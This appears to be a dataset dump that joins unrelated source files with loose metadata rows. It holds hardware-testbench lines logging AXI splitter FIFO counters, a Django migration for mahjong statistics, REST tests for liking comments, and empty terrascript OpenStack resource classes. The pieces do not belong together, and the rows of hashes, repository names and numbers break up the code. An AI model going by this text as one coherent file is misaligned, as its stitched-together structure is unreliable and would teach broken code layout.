logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split6.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split6.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split6.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split6.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split6.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split7.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split7.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split7.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split7.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split7.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split7.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split7.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split7.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split7.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split7.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split7.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split7.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split8.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split8.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split8.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split8.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split8.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split8.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split8.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split8.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split8.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split8.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split8.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split8.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split9.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split9.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split9.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split9.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split9.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split9.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split9.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split9.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split9.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split9.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split9.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split9.axi_wr_4_splitter.w_fifo.count"))
| 109.867638 | 163 | 0.775824 | 104,394 | 550,327 | 3.697186 | 0.001169 | 0.097004 | 0.080588 | 0.101481 | 0.999544 | 0.999544 | 0.999544 | 0.999544 | 0.999544 | 0.999544 | 0 | 0.047008 | 0.077223 | 550,327 | 5,008 | 164 | 109.889577 | 0.71302 | 0 | 0 | 0 | 0 | 0 | 0.686598 | 0.650255 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0006 | false | 0 | 0.0004 | 0 | 0.001399 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d97bd05a4bc485abeb5b290c60e9ab0916f6aae8 | 1,723 | py | Python | server/player/mahjong_soul/migrations/0004_auto_20191231_0931.py | eIGato/mahjong-portal | 550a2a872c4287adab6ce30c3440dc2141430a20 | [
"MIT"
] | 10 | 2018-02-12T10:30:22.000Z | 2020-06-29T21:06:15.000Z | server/player/mahjong_soul/migrations/0004_auto_20191231_0931.py | eIGato/mahjong-portal | 550a2a872c4287adab6ce30c3440dc2141430a20 | [
"MIT"
] | 62 | 2018-01-05T04:52:38.000Z | 2021-04-10T07:14:45.000Z | server/player/mahjong_soul/migrations/0004_auto_20191231_0931.py | MahjongRepository/mahjong-leaderboard | 77dfd26cb812c12fa7c2b11e862bb80a9135ccb0 | [
"MIT"
] | 8 | 2018-05-11T11:05:41.000Z | 2021-03-10T08:10:50.000Z | # Generated by Django 2.2.6 on 2019-12-31 09:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mahjong_soul', '0003_mspointshistory'),
]
operations = [
migrations.AlterField(
model_name='msaccountstatistic',
name='hanchan_first_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='hanchan_fourth_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='hanchan_second_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='hanchan_third_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='tonpusen_first_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='tonpusen_fourth_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='tonpusen_second_place',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='msaccountstatistic',
name='tonpusen_third_place',
field=models.PositiveIntegerField(default=0),
),
]
| 31.907407 | 57 | 0.60534 | 140 | 1,723 | 7.264286 | 0.271429 | 0.157325 | 0.196657 | 0.228122 | 0.849558 | 0.849558 | 0.849558 | 0.73943 | 0.73943 | 0.73943 | 0 | 0.022259 | 0.295995 | 1,723 | 53 | 58 | 32.509434 | 0.816158 | 0.026117 | 0 | 0.680851 | 1 | 0 | 0.200477 | 0.02506 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.085106 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d985fd8e5e4a4087b2ae278bcdbc89f1df096dce | 7,868 | py | Python | authors/apps/comments/tests/test_likes.py | KabohaJeanMark/ah-backend-invictus | a9cf930934e8cbcb4ee370a088df57abe50ee6d6 | [
"BSD-3-Clause"
] | 7 | 2021-03-04T09:29:13.000Z | 2021-03-17T17:35:42.000Z | authors/apps/comments/tests/test_likes.py | KabohaJeanMark/ah-backend-invictus | a9cf930934e8cbcb4ee370a088df57abe50ee6d6 | [
"BSD-3-Clause"
] | 25 | 2019-04-23T18:51:02.000Z | 2021-06-10T21:22:47.000Z | authors/apps/comments/tests/test_likes.py | KabohaJeanMark/ah-backend-invictus | a9cf930934e8cbcb4ee370a088df57abe50ee6d6 | [
"BSD-3-Clause"
] | 7 | 2019-06-29T10:40:38.000Z | 2019-09-23T09:05:45.000Z | import json
from rest_framework.test import APIClient, APITestCase
from authors.apps.authentication.models import User
from authors.apps.comments.tests.base import BaseTestCase
from django.urls import reverse
from rest_framework import status
class TestLikeCommment(BaseTestCase):
"""Class to test like and unlike a comment."""
def test_user_to_like_own_comment(self):
"""Test post a comment on an article and like a comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header, format="json")
self.assertEqual(response1.status_code, 403)
def test_user_liking_your_own_comment(self):
"""Test liking your own comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header, format="json")
self.assertEqual(response1.data['message'], "You can not like your own comment.")
def test_user_to_liking_another_comment(self):
"""Test liking your own comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.status_code, 200)
def test_user_to_like_another_comment(self):
"""Test liking another comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.data['success'], "You have successfully liked this comment.")
self.assertEqual(response1.status_code, 200)
def test_user_to_like_twice_a_comment(self):
"""Test liking your own comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
response1 = self.client.post(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.data['message'], "Your like has been cancelled")
self.assertEqual(response1.status_code, 200)
def test_user_has_not_liked_a_comment(self):
"""Test a user has ever liked a comment."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('get_likes', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.get(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertIn('False', str(response1.data))
def test_user_has_not_liked_comment(self):
"""Test a user has never liked a comment using status code."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url1 = reverse('get_likes', kwargs={'article_id':1, 'comment_id':comment_id})
response1 = self.client.get(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.status_code, 200)
def test_user_has_liked_comment(self):
"""Test a user has ever liked a comment using status code."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url0 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
url1 = reverse('get_likes', kwargs={'article_id':1, 'comment_id':comment_id})
response2 = response.client.post(url0,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
response1 = self.client.get(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertEqual(response1.status_code, 200)
self.assertIn('True', str(response1.data))
def test_user_has_likes_comment(self):
"""Test a user has ever liked a comment using message."""
url = reverse('comment_list', kwargs={'article_id': 1})
response = self.client.post(url, self.comment,
HTTP_AUTHORIZATION=self.auth_header,
format="json")
comment_id = response.data['comment']['id']
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
url0 = reverse('like_comment', kwargs={'article_id':1, 'comment_id':comment_id})
url1 = reverse('get_likes', kwargs={'article_id':1, 'comment_id':comment_id})
response2 = response.client.post(url0,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
response1 = self.client.get(url1,
HTTP_AUTHORIZATION=self.auth_header2, format="json")
self.assertIn('True', str(response1.data))
| 57.014493 | 96 | 0.607397 | 883 | 7,868 | 5.193658 | 0.096263 | 0.0785 | 0.096162 | 0.114479 | 0.897732 | 0.880506 | 0.870257 | 0.843873 | 0.843873 | 0.843873 | 0 | 0.021483 | 0.278216 | 7,868 | 137 | 97 | 57.430657 | 0.786054 | 0.052872 | 0 | 0.820513 | 0 | 0 | 0.113498 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 1 | 0.076923 | false | 0 | 0.051282 | 0 | 0.136752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
79424770b1f8337bb2cf586e89d8c1a8121df1ba | 5,860 | py | Python | terrascript/openstack/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | terrascript/openstack/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | terrascript/openstack/r.py | vutsalsinghal/python-terrascript | 3b9fb5ad77453d330fb0cd03524154a342c5d5dc | [
"BSD-2-Clause"
] | null | null | null | # terrascript/openstack/r.py
import terrascript
class openstack_blockstorage_quotaset_v2(terrascript.Resource):
pass
class openstack_blockstorage_quotaset_v3(terrascript.Resource):
pass
class openstack_blockstorage_volume_v1(terrascript.Resource):
pass
class openstack_blockstorage_volume_v2(terrascript.Resource):
pass
class openstack_blockstorage_volume_v3(terrascript.Resource):
pass
class openstack_blockstorage_volume_attach_v2(terrascript.Resource):
pass
class openstack_blockstorage_volume_attach_v3(terrascript.Resource):
pass
class openstack_compute_flavor_v2(terrascript.Resource):
pass
class openstack_compute_flavor_access_v2(terrascript.Resource):
pass
class openstack_compute_instance_v2(terrascript.Resource):
pass
class openstack_compute_interface_attach_v2(terrascript.Resource):
pass
class openstack_compute_keypair_v2(terrascript.Resource):
pass
class openstack_compute_secgroup_v2(terrascript.Resource):
pass
class openstack_compute_servergroup_v2(terrascript.Resource):
pass
class openstack_compute_floatingip_v2(terrascript.Resource):
pass
class openstack_compute_floatingip_associate_v2(terrascript.Resource):
pass
class openstack_compute_volume_attach_v2(terrascript.Resource):
pass
class openstack_containerinfra_clustertemplate_v1(terrascript.Resource):
pass
class openstack_containerinfra_cluster_v1(terrascript.Resource):
pass
class openstack_db_instance_v1(terrascript.Resource):
pass
class openstack_db_user_v1(terrascript.Resource):
pass
class openstack_db_configuration_v1(terrascript.Resource):
pass
class openstack_db_database_v1(terrascript.Resource):
pass
class openstack_dns_recordset_v2(terrascript.Resource):
pass
class openstack_dns_zone_v2(terrascript.Resource):
pass
class openstack_fw_firewall_v1(terrascript.Resource):
pass
class openstack_fw_policy_v1(terrascript.Resource):
pass
class openstack_fw_rule_v1(terrascript.Resource):
pass
class openstack_identity_endpoint_v3(terrascript.Resource):
pass
class openstack_identity_project_v3(terrascript.Resource):
pass
class openstack_identity_role_v3(terrascript.Resource):
pass
class openstack_identity_role_assignment_v3(terrascript.Resource):
pass
class openstack_identity_service_v3(terrascript.Resource):
pass
class openstack_identity_user_v3(terrascript.Resource):
pass
class openstack_identity_application_credential_v3(terrascript.Resource):
pass
class openstack_images_image_v2(terrascript.Resource):
pass
class openstack_lb_member_v1(terrascript.Resource):
pass
class openstack_lb_monitor_v1(terrascript.Resource):
pass
class openstack_lb_pool_v1(terrascript.Resource):
pass
class openstack_lb_vip_v1(terrascript.Resource):
pass
class openstack_lb_loadbalancer_v2(terrascript.Resource):
pass
class openstack_lb_listener_v2(terrascript.Resource):
pass
class openstack_lb_pool_v2(terrascript.Resource):
pass
class openstack_lb_member_v2(terrascript.Resource):
pass
class openstack_lb_monitor_v2(terrascript.Resource):
pass
class openstack_lb_l7policy_v2(terrascript.Resource):
pass
class openstack_lb_l7rule_v2(terrascript.Resource):
pass
class openstack_networking_floatingip_v2(terrascript.Resource):
pass
class openstack_networking_floatingip_associate_v2(terrascript.Resource):
pass
class openstack_networking_network_v2(terrascript.Resource):
pass
class openstack_networking_port_v2(terrascript.Resource):
pass
class openstack_networking_rbac_policy_v2(terrascript.Resource):
pass
class openstack_networking_port_secgroup_associate_v2(terrascript.Resource):
pass
class openstack_networking_qos_bandwidth_limit_rule_v2(terrascript.Resource):
pass
class openstack_networking_qos_dscp_marking_rule_v2(terrascript.Resource):
pass
class openstack_networking_qos_minimum_bandwidth_rule_v2(terrascript.Resource):
pass
class openstack_networking_qos_policy_v2(terrascript.Resource):
pass
class openstack_networking_router_v2(terrascript.Resource):
pass
class openstack_networking_router_interface_v2(terrascript.Resource):
pass
class openstack_networking_router_route_v2(terrascript.Resource):
pass
class openstack_networking_secgroup_v2(terrascript.Resource):
pass
class openstack_networking_secgroup_rule_v2(terrascript.Resource):
pass
